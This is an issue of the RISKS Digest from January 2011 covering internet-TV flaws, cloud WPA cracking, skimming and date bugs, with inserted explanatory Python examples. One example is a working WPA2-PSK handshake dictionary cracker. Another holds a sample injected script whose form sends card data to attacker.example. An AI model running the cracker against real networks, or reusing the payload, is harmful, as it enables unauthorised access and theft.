The Risks Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 26 Issue 29

Thursday 13 January 2011

Contents

Jackpot: Bug or Feature?
Chuck Weinstock
Researchers Hack Internet Enabled TVs, Discover Multiple Security Vulnerabilities
Mike Lennon via Monty Solomon
Caveman: Using the cloud to break passwords
Dan Goodin
Infected PC Compromises Pentagon Credit Union
slashdot via Robert Schaefer
3 Tucson UMC workers fired for records access
Stephanie Innes via Monty Solomon
Bug Causes iPhone Alarm to Greet New Year With Silence
Nick Bilton via Monty Solomon
Wristwatch fails 2010->2011 transition
Bill Stewart
Security risks in PDF documents
Lauren Weinstein
New twist on ATM skimming: put the data collector inside the gas pump!
Paul Saffo
Risks of Touring the White House
Daniel Faigin
Confusing Interface
Gene Wirchenko
Re: "Risk of coffee in the cockpit", maybe, maybe not
Danny Burstein
Re: RISKS of reusing ID numbers
Jonathan Kamens
50th Anniversary of Eisenhower's Farewell Address
PGN
Call for Papers: RAID'11
Guofei Gu

Jackpot: Bug or Feature?

Chuck Weinstock <weinstock@sei.cmu.edu>
Tue, 4 Jan 2011 09:54:49 -0500

http://www.post-gazette.com/pg/11004/1115414-58.stm

A man in Pittsburgh was arrested on a federal warrant accusing him of
stealing as much as $1.4 million from US casinos. He was about to stand
trial for bilking a local casino out of nearly a half-million dollars in
fraudulent jackpots.

The jackpots resulted from a flaw in the software of certain IGT
machines. These machines apparently awarded a jackpot when a special
sequence of buttons was pushed.

I wonder if a good defense here is that the machine was doing exactly what
it was programmed to do and all the defendant was doing was using expert
play to increase his chances of winning.


Researchers Hack Internet Enabled TVs, Discover Multiple Security Vulnerabilities (Mike Lennon)

Monty Solomon <monty@roscom.com>
Sun, 9 Jan 2011 12:05:04 -0500

Mike Lennon, Researchers Hack Internet Enabled TVs, Discover Multiple Security
Vulnerabilities, *SecurityWeek*, 3 Jan 2011

Internet TVs - The Latest Attack Vector: Researchers Hack Internet
Enabled TVs, Discover Multiple Security Vulnerabilities

Was your home lucky enough to get a new Internet enabled TV over the
holidays? If so, you're probably quite excited and enjoying the features of
your new digital media hub while you sit back and sip on some eggnog or hot
chocolate from your couch - which you should. But you may also want to be
careful, as Internet TVs could be the newest avenue for cybercriminals to
infiltrate your home or business. (I know, more FUD from a security vendor,
but this is actually interesting stuff and they were able to show us how it
was done)

Security researchers have discovered several security flaws in one of the
best-selling brands of Internet-connected HDTVs, and believe it's likely
that similar security flaws exist in other Internet TVs.

During the course of its research, Mocana, the security firm that discovered
the flaws, demonstrated that the TV's Internet interface failed to confirm
script integrity before scripts were run. As a result, an attacker could
intercept transmissions from the television to the network using common
"rogue DNS", "rogue DHCP server", or TCP session hijacking
techniques. Mocana was able to demonstrate that JavaScript could then be
injected into the normal datastream, allowing attackers to obtain total
control over the device's Internet functionality. This attack could render
the product unusable at important times and extend or limit its
functionality without the manufacturer's permission. More importantly,
however, this same mechanism could be used to extract sensitive credentials
from the TV's memory, or prompt the user to fill out fake online forms to
capture credit card information. (Mocana did issue a technical report on the
details of the security vulnerabilities which is available here - short
registration required)

Additionally, researchers were able to recover the manufacturer's private
"third-party developer keys" from the television, because in many cases,
these keys were transmitted unencrypted and "in the clear." Many third-party
search, music, video and photo-sharing services delivered over the Internet
require such keys, and a big TV manufacturer often purchases high-volume
"special" access privileges to these service provider's networks. A hacker
could potentially employ these keys, for example, to access these
high-volume services at no charge (or at least, on the TV manufacturer's
bill). ...

http://www.securityweek.com/researchers-hack-internet-enabled-tvs-discover-multiple-security-vulnerabilities
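The flaw Mocana describes is a missing verify-before-run step: the set's interface fetched scripts over the network and executed whatever arrived, so anyone who could answer the TV's DNS or DHCP requests, or hijack the TCP session, could substitute their own JavaScript. The following is an added example (not code from Mocana's report or from any TV vendor) contrasting that behaviour with a loader that pins a SHA-256 digest per script in a manifest assumed to ship inside the signed firmware image, the same idea as browser Subresource Integrity. The script bodies, the URL and the manifest are constructed test data.

```python
"""Verify-before-run loading of network-delivered UI scripts.

Added example; not code from Mocana's report or from any TV vendor. A device
that fetches interface scripts over plain HTTP and runs whatever arrives can
be fed attacker JavaScript by anyone controlling DNS, DHCP or the TCP session.
The fix pins a SHA-256 digest per script in a manifest assumed to live inside
the firmware image; a substituted script fails the check and is never handed
to the interpreter. Script bodies, URL and manifest are constructed test data.
"""
import hashlib
import hmac

GUIDE_URL = "http://tv-portal.example/ui/guide.js"  # hypothetical endpoint

# Constructed: the genuine script the vendor serves.
GENUINE_SCRIPT = b"function showGuide(){ renderGuide(fetchListings()); }\n"

# Constructed: the same script with a card-phishing form appended, as a
# rogue-DNS or session-hijacking attacker would serve it.
INJECTED_SCRIPT = GENUINE_SCRIPT + (
    b"document.body.innerHTML = '<form action=\"http://attacker.example/c\">"
    b"Re-enter your card number to continue</form>';\n")

# Pinned digests. These must come from the signed firmware image, not from the
# network, or the attacker simply substitutes the manifest as well.
PINNED_MANIFEST = {GUIDE_URL: hashlib.sha256(GENUINE_SCRIPT).hexdigest()}


class IntegrityError(Exception):
    pass


def vulnerable_loader(url: str, body: bytes) -> bytes:
    """The behaviour Mocana found: whatever the network returned gets run."""
    return body


def hardened_loader(url: str, body: bytes, manifest=PINNED_MANIFEST) -> bytes:
    """Refuse to run any script whose digest is not pinned for its URL."""
    expected = manifest.get(url)
    if expected is None:
        raise IntegrityError(f"no pinned digest for {url}")
    actual = hashlib.sha256(body).hexdigest()
    if not hmac.compare_digest(actual, expected):
        raise IntegrityError(f"digest mismatch for {url}: got {actual[:16]}...")
    return body


def fetch_and_run(loader, attacker_in_path: bool) -> str:
    """Simulate one page load and report 'executed' or 'blocked'; a real
    device would pass the returned bytes to its JavaScript engine."""
    body = INJECTED_SCRIPT if attacker_in_path else GENUINE_SCRIPT
    try:
        loader(GUIDE_URL, body)
        return "executed"
    except IntegrityError:
        return "blocked"


if __name__ == "__main__":
    for name, loader in (("vulnerable", vulnerable_loader),
                         ("hardened", hardened_loader)):
        print(name, "| clean network:", fetch_and_run(loader, False),
              "| attacker in path:", fetch_and_run(loader, True))
```

Pinning the content rather than trusting the transport is what makes the rogue-DNS and session-hijack paths irrelevant; the one thing the check cannot do is protect a manifest that is itself fetched from the network, which is why the example assumes it is baked into the firmware.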


Caveman: Using the cloud to break passwords

"Peter G. Neumann" <neumann@csl.sri.com>
Wed, 12 Jan 2011 1:58:26 PST

  [Thanks to Jeremy Epstein and Matthew Kruk.]

Dan Goodin in San Francisco, Researcher cracks Wi-Fi passwords
with Amazon cloud: Return of the Caveman attack, *The Register*, 11 Jan 2011
http://www.theregister.co.uk/2011/01/11/amazon_cloud_wifi_cracking/

A security researcher has tapped Amazon's cloud computing service to crack
Wi-Fi passwords in a fraction of the time and for a fraction of the cost of
using his own gear.  Thomas Roth of Cologne, Germany told Reuters [1] he
used custom software running on Amazon's Elastic Compute Cloud service to
break into a WPA-PSK protected network in about 20 minutes. With refinements
to his program, he said he could shave the time to about six minutes. With
EC2 computers available for 28 cents per minute, the cost of the crack came
to just $1.68.  "People tell me there is no possible way to break WPA, or,
if it were possible, it would cost you a ton of money to do so," Roth told
the news service. "But it is easy to brute force them."

Roth is the same researcher who in November used Amazon's cloud to brute
force SHA-1 hashes [2]. Roth said he cracked 14 hashes from a 160-bit SHA-1
hash with a password of between one and six characters in about 49
minutes. He told The Register at the time he'd be able to significantly
reduce that time with minor tweaks to his software, which made use of
"Cluster GPU Instances" of the EC2 service [3].

As the term suggests, brute force cracks are among the least sophisticated
means of gaining unauthorized access to a network. Rather than exploit
weaknesses, they try huge numbers of possible passwords until the right
phrase is entered. Roth has combined this caveman approach with a highly
innovative technique that applies it to extremely powerful servers that
anyone can rent at highly affordable rates.

Roth's latest program uses EC2 to run through 400,000 possible passwords per
second, a massive amount that only a few years ago would have required the
resources of a supercomputer. He is scheduled to present his findings [4] at
next week's Black Hat security conference in Washington, DC.

   1. http://uk.reuters.com/article/idUKTRE70641M20110107
   2. http://www.theregister.co.uk/2010/11/18/amazon_cloud_sha_password_hack/
   3. https://aws.amazon.com/ec2/
   4. http://www.blackhat.com/html/bh-dc-11/bh-dc-11-briefings.html#Roth
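What Roth's EC2 instances parallelise is the per-guess work of a WPA/WPA2-PSK dictionary attack: derive the PMK from the candidate passphrase with PBKDF2-HMAC-SHA1 (4096 rounds, SSID as salt), expand it to the PTK with the 802.11i PRF using the two MAC addresses and the two nonces from the captured 4-way handshake, and check whether the first 16 bytes (the KCK) reproduce the MIC on one of the EAPOL frames. The following is an added example, not the article's code and not Roth's tool; the "capture" is constructed in-script from a known passphrase, and the SSID, MAC addresses, nonces and EAPOL frame are arbitrary test values rather than data from any real network.

```python
"""WPA2-PSK offline dictionary attack against a captured 4-way handshake.

Added example, not the article's code and not Thomas Roth's EC2 tool. The
capture is constructed from a known passphrase; SSID, MACs, nonces and the
EAPOL frame are arbitrary test values, not data from any real network.
"""
import hashlib
import hmac

PBKDF2_ITERATIONS = 4096  # fixed by IEEE 802.11i for WPA/WPA2-PSK


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK from the PMK, both MACs and both nonces (sorted)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return ptk[:64]  # bytes 0..15 are the KCK that keys the EAPOL MIC


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key-descriptor-version-2 MIC: HMAC-SHA1 over the frame with the MIC
    field (offset 81..96: 4-byte 802.1X header + 77 bytes of key frame) zeroed."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal handshake message 2 (STA -> AP) with an all-zero MIC field."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: v2 (HMAC-SHA1), pairwise, MIC
            + b"\x00\x10"                # key length 16
            + b"\x00" * 7 + b"\x01"      # replay counter 1
            + snonce                     # 32-byte SNonce
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID
            + b"\x00" * 16               # key MIC (filled in by the STA)
            + b"\x00\x00")               # key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_test_capture(passphrase: str = "letmein1", ssid: str = "RISKS-TEST") -> dict:
    """Construct what a sniffer would hand the cracker, using a known passphrase."""
    ap_mac = bytes.fromhex("001122334455")   # constructed test values
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    frame = build_eapol_msg2(snonce)
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], frame)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce,
            "eapol": frame[:81] + mic + frame[97:], "mic": mic}


def crack(capture: dict, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured
    MIC, or None. Each candidate costs a full 4096-round PBKDF2 run."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]),
                               capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    cap = make_test_capture()
    print("recovered:", crack(cap, ["password", "qwerty", "letmein", "letmein1"]))
```

Nothing in the exchange limits the number of guesses: the handshake is captured once and every candidate is tested offline, so the only defence the protocol offers is the 4096-round PBKDF2 cost per guess, and GPUs amortise that across thousands of candidates in parallel. Passphrase length and entropy, not the WPA2 algorithms, decide whether a given network falls in six minutes.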


Infected PC Compromises Pentagon Credit Union

Robert Schaefer <rps@haystack.mit.edu>
Thu, 13 Jan 2011 08:21:30 -0500

"The credit union used by members of the U.S. armed forces and their
families has admitted that a laptop infected with malware was used to access
a database containing the personal and financial information of customers.
The Pentagon Federal Credit Union (PenFed) issued a statement to the New
Hampshire Attorney General that said data, including the names, addresses,
Social Security Numbers and PenFed banking and credit card account
information of its members were accessed by the infected PC."

slashdot, 12 Jan 2011
https://threatpost.com/en_us/blogs/infected-pc-compromises-pentagon-credit-union-011211

robert schaefer, Atmospheric Sciences Group, MIT Haystack Observatory
Westford, MA 01886 1-781-981-5767 http://www.haystack.mit.edu


3 Tucson UMC workers fired for records access (Stephanie Innes)

Monty Solomon <monty@roscom.com>
Thu, 13 Jan 2011 10:31:04 -0500

Stephanie Innes, *Arizona Daily Star*, 12 Jan 2011

Three employees at Tucson's University Medical Center have been fired for
violating patient privacy in connection with accessing confidential medical
records in the high-profile shooting rampage that killed six people and left
Congresswoman Gabrielle Giffords in critical condition, hospital officials
said.  All the remaining injured patients from the shootings, including
Giffords, are at UMC.  ...

http://azstarnet.com/news/local/crime/article_4f789a48-1e8c-11e0-929a-001cc4c002e0.html


Bug Causes iPhone Alarm to Greet New Year With Silence

Monty Solomon <monty@roscom.com>
Mon, 3 Jan 2011 19:20:51 -0500

Nick Bilton, Bug Causes iPhone Alarm to Greet New Year With Silence,
*The New York Times*, 2 Jan 2011

Pat Kiernan, a morning anchor on NY1, the New York City cable news channel,
is no stranger to alarm clock problems. That's why he usually relies on
several clocks, phones and other devices to wake him in time for his early
newscasts.

That redundancy paid off for Mr. Kiernan on Saturday when his primary alarm,
the one built into his Apple iPhone, failed to go off because of a
programming error in the phone's calendar software.

"Before I went to bed I set two iPhone alarms, and both completely failed to
go off," said Mr. Kiernan, adding that he uses the iPhone as his alarm clock
when he travels. "Luckily I had an Android phone with me as a third backup
alarm, and it woke me up in time for my news segment."

Many people weren't as lucky as Mr. Kiernan, voicing frustration online
after they overslept on the first morning of the new year.

By Sunday morning thousands more people were posting angry missives about
the iPhone problem on Twitter, Facebook and other social networks, noting
that they had missed a breakfast meeting or were running late for work or
church. ...

http://www.nytimes.com/2011/01/03/technology/03iphone.html


Wristwatch fails 2010->2011 transition

Bill Stewart <bill.stewart@pobox.com>
Sat, 01 Jan 2011 01:59:51 -0800

At last night's New Years Eve party, we were already disturbed to find
significant time skew between people who had cell phones and wristwatches
that are automatically set from WWV.  (Most of the phones either had the
same time or didn't show seconds.)

And then at midnight, somebody's new digital wristwatch failed :-) We're not
really sure what happened, and it fixed itself about 10 minutes later, but
the owner said it spent a while going back and forth between 00:12 and 00:13
or something equally strange.  This being a techie crowd, it led to the
usual stories about Y2K and programs on punched cards that needed to be
rewritten for the one-digit-date rollover from 1979->1980 and such, but
after Y2K you'd think people would just Know Better.


Security risks in PDF documents

Lauren Weinstein <lauren@vortex.com>
Sun, 2 Jan 2011 08:48:11 -0800

  [From Network Neutrality Squad]
http://bit.ly/gUuFCU  (The H Security)

Depending on implementation details, this may be an argument for viewing PDF
documents in inherently more "sandboxed" environments like Google Chrome
(which has a basic internal PDF viewer) rather than using full-blown Adobe
readers (when possible and practical, given current feature requirements in
any given case).


New twist on ATM skimming: put the data collector inside the gas pump!

Paul Saffo <psaffo@mac.com>
Wed, 12 Jan 2011 07:23:50 -0800

Two Men Plea Guilty in Sophisticated Gas Station ATM and Credit Card
Skimming Scheme, 11 Jan 2011, Contact: (510) 622-4500
http://oag.ca.gov/news/press_release?id=2024

Martinez CA, Two men were sentenced today to prison for their role in
stealing more than $90,000 from some 200 people in Northern California by
stealing personal financial information with a sophisticated skimming device
placed inside ATM and credit card payment devices at gas station pumps.

This morning in Contra Costa County Superior Court in Martinez, the two men
pleaded guilty to all felonies they were charged with, including conspiracy
and identity theft. David Karapetyan, 32, pled guilty to 37 felonies and
received a seven-year prison sentence. Zhirayr Zamanyan, 31, pled guilty to
five felonies and received a five-year prison sentence. Two other
defendants, Edwin Hamazaspyan, 31, and Naum Mints, 21, are scheduled to
appear in court on February 15.

In March, the Attorney General's office took over prosecution of the case
from the Contra Costa District Attorney's office because the crimes occurred
in multiple jurisdictions throughout Northern California. An amended
complaint was filed in October.

In their high-tech crime spree, the gang traveled to gas stations across the
Bay Area in a rented Cadillac Escalade. From November 2009 to February 2010,
they are believed to have stolen $90,000 from 196 people through their
skimming scheme.

The thieves acquired keys to unlock various kinds of gas station pumps. Once
they opened the pumps, they were able to connect two cables inside to their
two-inch electronic device, which looked like a circuit board encased in
electrical tape, and recorded ATM and credit card data as well as victims'
PINs. No tampering was visible on the outside of the pumps. The gang would
later return to retrieve the skimmers, which took less than 20 seconds.

The investigation began in February when police in Solano and Contra Costa
counties reported an increase in identity theft and a 7-Eleven store
employee in Martinez noticed a skimming device inside a gas pump. Police
removed the device, replaced it with a mock device and conducted 24-hour
surveillance. Karapetyan and Zamanyan were arrested when they arrived to
remove the device. In total, seven devices were found inside gas pumps in
Martinez, Benicia, Livermore, Hayward, Oakland, San Mateo and Sacramento.

Banks have reimbursed the victims.

The Northern California Computer Crimes Task Force, a partnership of 17
local, state and federal agencies, participated in the investigation with
assistance from the U.S. Secret Service, Martinez Police Department and the
Glendale Police Department.

The amended complaint and second amended complaint, as well as the arrest
affidavit for Mints, are attached to the electronic version of the press
release on the Attorney General's website: www.ag.ca.gov


Risks of Touring the White House

Daniel Faigin <faigin@cahighways.org>
Tue, 4 Jan 2011 12:04:40 -0800

My daughter is getting ready for a Confirmation Class trip to Washington DC,
which will include a trip to the White House. So I received an email request
from the trip coordinator stating: "There is a security form that I must
fill out and I need the following information for each student/participant
ASAP! 1. Name as it appears on Drivers License or other legal document;
2. Social Security Number; 3. Exact Date of Birth; 4. Citizen of US? Yes or
No?; 5. City of current residence." She needed it ASAP, and I'm betting most
parents will blindly email her the SSN. I've already informed her of the
problem with doing that, but this is just the tip of the iceberg.

I wanted to see why the SSN was required, and so I did some searching.  I
found Rep Elton Gallegly's site on tours
(https://forms.house.gov/gallegly/forms/tours/tour_request.shtml), and it
calls for the same information. So this seems to be a White House
requirement (and SSNs seem to be a common identifier for searching security
records, even though that isn't their real use). However, what is scary is
the following: " Download Security Information Sheet (Excel) and email to
CA24.Tours@mail.house.gov". Yup. Email again. You would think in this era of
the Privacy Act the White House webmaster would have set up an HTTPS: page
to submit this information.

Daniel Faigin, CISSP
faigin -at cahighways -dot org
Journal/Blog: cahwyguy.livejournal.com Facebook: facebook.com/cahwyguy


Confusing Interface

Gene Wirchenko <genew@ocis.net>
Mon, 10 Jan 2011 13:44:23 -0800

I just got an Epson Stylus NX215 printer.  I hope it lasts longer than my
Dell laser printer which did not get through its second toner cartridge
although my usage was not heavy in the 3 1/2 years that I used it.

My new printer has very nice documentation for the installation, but one
little bit got me.  Near the end, there is the option to install some
additional goodies.  The interface was less than clear.

"Select the items you want and click Install".  OK.  What do the Xs mean?
Do they mean that the items have been selected, or that no, they have not
been?  The form starts with an X in each choice.

It turns out that X means selected, but it could easily mean the other way
around since X can mean wrong or no.

Windows has standard input controls, but it seems that it is not the thing
to do to use them when writing your installation program.  I have run into
the attitude before.  In one USENET posting, a newbie was asking about other
controls.  He did not want to use the standard ones, BECAUSE they were
standard.

I remember one of the benefits of Windows pushed in the early days that with
standard interfaces, it would be easier.  My bet was that, since graphics
was getting to be very important, the standard controls would be considered
not good enough.  I wish I had bet money on this.  This is not the first
time that I have been puzzled by non-standard controls.


Re: "Risk of coffee in the cockpit", maybe, maybe not

Danny Burstein <dannyb@panix.com>
Wed, 12 Jan 2011 20:29:31 -0500 (EST)
  (Brown, RISKS-26.28)

The aviation folk are having lots of fun digesting this story and trying to
determine whether or not the claimed scenario is, indeed, plausible.

Curiously enough the film "Fate is the Hunter" [a] aired, err, cabled... on
the Turner Classic Movies cable channel a week or so ago. The plot revolves
around an airplane crash which seems to be due to pilot error.

One investigator just can't believe "his pilot" would do something that
careless.

The relevance here (rot-13'ed as it's a spoiler):

Vg gheaf bhg gung n fcvyyrq phc bs pbssrr fubegrq
bhg gur pbageby pvephvgel, xabpxvat bhg gur ratvarf.

So it may be that we have real life following a movie
script. Or possibly just the reporting of same...

[a] http://en.wikipedia.org/wiki/Fate_Is_the_Hunter_%28film%29
     http://www.imdb.com/title/tt0058091/
   [Also noted by Charlie Shub, citing the author of the 1961 movie
   Ernest K. Gann, and the Glenn Ford movie (1964).  PGN]


Re: RISKS of reusing ID numbers (RISKS 26.27)

Jonathan Kamens <jik@kamens.us>
Wed, 12 Jan 2011 09:28:16 -0500

  [I somehow missed Geoff Kuenning's response to Jonathan before putting out
  RISKS-26.28.  But I thought Jonathan's posting stood on its own.  This
  time, Geoff's reply to Jonathan follows below.  PGN]

Geoff, It seems to me that Apple is not *complicit* in this case. Rather,
Apple is *the cause* of the problem you encountered.

If TNT's tracking numbers end with two letters, and Apple doesn't include
the two letters when giving out TNT tracking numbers, then the confusion was
introduced by Apple, not by TNT.

I have no direct knowledge of how TNT generates tracking numbers, but with
those two letters at the end, I can easily envision a tracking number
algorithm which would completely eliminate the potential for confusion. For
example, if the two letters indicate in base 26 the number of days since
some baseline date modulo 676 (26*26), which gives you a range of 1.85
years, then as long as (a) TNT removes old shipping records from their Web
tracking in less than 1.85 years, and (b) their system ensures that the same
tracking number is not used twice /in the same day/, tracking number
confusion will never occur.

I think a correction to RISKS is in order.

On 01/12/2011 07:57 AM, Geoff Kuenning wrote:
>> Their Web site says, "If your consignment number appears more than once
>> in the results field, you can use the letters as shown on your
>> consignment note, e.g. GE123456781WW, to avoid duplicate results." Were
>> you given those letters? Did using them eliminate the duplication?

> Interesting; I missed seeing that note.  No, I wasn't given those letters.
> I cut and pasted directly from Apple's e-mail.  So apparently Apple is
> complicit in this case.  (*Why* would they go out of their way to remove
> information?  It can't be easy to correctly reduce the ID number from
> multiple shipping suppliers to a minimal acceptable value.  Weird.)
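The scheme Jonathan sketches above, as an added example that is not part of the original posting and is not TNT's actual algorithm (he says he has no knowledge of it): the two letters encode the number of days since a baseline date, modulo 676, in base 26. The baseline date, carrier prefix and serial numbers are made up for the demonstration; the two conditions he states (old records purged within 1.85 years, no reuse of a number within one day) appear as `prune` and `same_day_duplicates`.

```python
"""Day-stamp letter suffix for a tracking number, as sketched in the posting.

Added example illustrating Jonathan Kamens's proposed scheme; it is not TNT's
actual algorithm, and the baseline date, prefix and serials are made up.
"""
from datetime import date, timedelta

BASELINE = date(2010, 1, 1)   # assumed epoch for the day counter
PERIOD = 26 * 26              # 676 two-letter codes, about 1.85 years


def day_suffix(shipped_on: date) -> str:
    """Two letters = (days since BASELINE) mod 676, written in base 26."""
    n = (shipped_on - BASELINE).days % PERIOD
    return chr(ord("A") + n // 26) + chr(ord("A") + n % 26)


def suffix_day_index(suffix: str) -> int:
    """Inverse of day_suffix: the day counter value (0..675)."""
    hi, lo = (ord(c) - ord("A") for c in suffix.upper())
    return hi * 26 + lo


def tracking_number(prefix: str, serial: int, shipped_on: date) -> str:
    return f"{prefix}{serial:08d}{day_suffix(shipped_on)}"


def make_record(prefix: str, serial: int, shipped_on: date, description: str) -> dict:
    return {"number": tracking_number(prefix, serial, shipped_on),
            "shipped_on": shipped_on, "description": description}


def lookup(records, query: str):
    """Exact match when the query carries its letters; if a retailer strips
    them (as Apple's e-mail did), fall back to the bare number and return
    every shipment that reused it."""
    if query[-2:].isalpha():
        return [r for r in records if r["number"] == query]
    return [r for r in records if r["number"][:-2] == query]


def prune(records, today: date):
    """Condition (a): drop anything PERIOD days old or older, so a suffix can
    never belong to two live records."""
    return [r for r in records if (today - r["shipped_on"]).days < PERIOD]


def same_day_duplicates(records):
    """Condition (b): the same bare number shipped twice on one day yields an
    identical full number; report any such defect."""
    seen, dupes = set(), []
    for r in records:
        if r["number"] in seen:
            dupes.append(r["number"])
        seen.add(r["number"])
    return dupes


if __name__ == "__main__":
    first = date(2010, 3, 1)
    recs = [make_record("GE", 12345678, first, "first parcel"),
            make_record("GE", 12345678, first + timedelta(days=346), "second parcel")]
    print("bare query hits:", len(lookup(recs, "GE12345678")),
          "| full query hits:", len(lookup(recs, recs[0]["number"])))
```

With both letters present the full number is unique as long as the two conditions hold; strip them, as Apple's e-mail did, and the same serial reused 346 days later comes back as two hits.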


50th Anniversary of Eisenhower's Farewell Address

"Peter G. Neumann" <neumann@csl.sri.com>
Thu, 13 Jan 2011 11:20:22 PST

CSPO and AAAS are co-sponsoring a seminar in Washington, D.C., commemorating
the 50th anniversary of President Dwight D. Eisenhower's farewell address.
Eisenhower's speech is mainly remembered for his warning of the perils of a
"military-industrial complex."  Less widely known, but no less important,
was his caution a few sentences later about "the danger that public policy
could itself become the captive of a scientific-technological elite."  This
seminar will explore the historical context and current relevance of
Eisenhower's worries.

Was He Right About the "Scientific-Technological Elite?"
AAAS Auditorium / Washington, D.C.

Panel:

* Dan Greenberg, science journalist and author of several books on science
  policy

* Gregg Pascal Zachary, author of the authoritative biography of Vannevar
  Bush

* William Lanouette, a journalist on science policy and a senior analyst on
  energy and science issues at GAO from 1991 to 2006

* Dan Sarewitz, co-director of CSPO

* Moderator:  Steve Lagerfeld, editor of The Wilson Quarterly

Live webcast Jan. 18 at 4:30p ET / 2:30p MT
GO TO: http://www.ustream.tv/channel/cspo


Call for Papers: RAID'11

"Guofei Gu" <guofei@cse.tamu.edu>
Thu, 13 Jan 2011 16:01:04 -0600

                   CALL FOR PAPERS: RAID 2011
  14th International Symposium on Recent Advances in Intrusion Detection
                      September 20-21, 2011
                 SRI International, Menlo Park, CA
                       http://raid2011.org
          Paper submission deadline: Mar 31, 2011 (11:59PM PST)
        [Excerpted for RISKS.  See raid2011.org for details.  PGN]

This symposium, the 14th in an annual series, brings together leading
researchers and practitioners from academia, government, and industry to
discuss issues and technologies related to intrusion detection and
defense. The Recent Advances in Intrusion Detection (RAID) International
Symposium series furthers advances in intrusion defense by promoting the
exchange of ideas in a broad range of topics. As in previous years, all
topics related to intrusion detection, prevention and defense systems and
technologies are within scope, including but not limited to the following:

    * Network and host intrusion detection and prevention
    * Anomaly and specification-based approaches
    * IDS cooperation and event correlation
    * Malware prevention, detection, analysis, containment
    * Web application security
    * Insider attack detection
    * Intrusion response, tolerance, and self-protection
    * Operational experiences with current approaches
    * Intrusion detection assessment and benchmarking
    * Attacks against intrusion detection systems
    * Formal models, analysis, and standards
    * Deception systems and honeypots
    * Vulnerability analysis and forensics
    * Adversarial machine learning for security
    * Visualization techniques
    * High-performance intrusion detection
    * Legal, social, and privacy issues
    * Network exfiltration detection
    * Botnet analysis, detection, and mitigation
    * Cyber-physical systems

    General Chair:     Alfonso Valdes, SRI International, US
    Program Chair:     Robin Sommer, ICSI/LBNL, US
    Program Co-Chair:  Davide Balzarotti, Eurecom, France
    Publication Chair: Gregor Maier, ICSI, US
    Publicity Chair:   Guofei Gu, Texas A&M, US

Guofei Gu, Assistant Professor, Department of Computer Science & Engineering
Texas A&M University
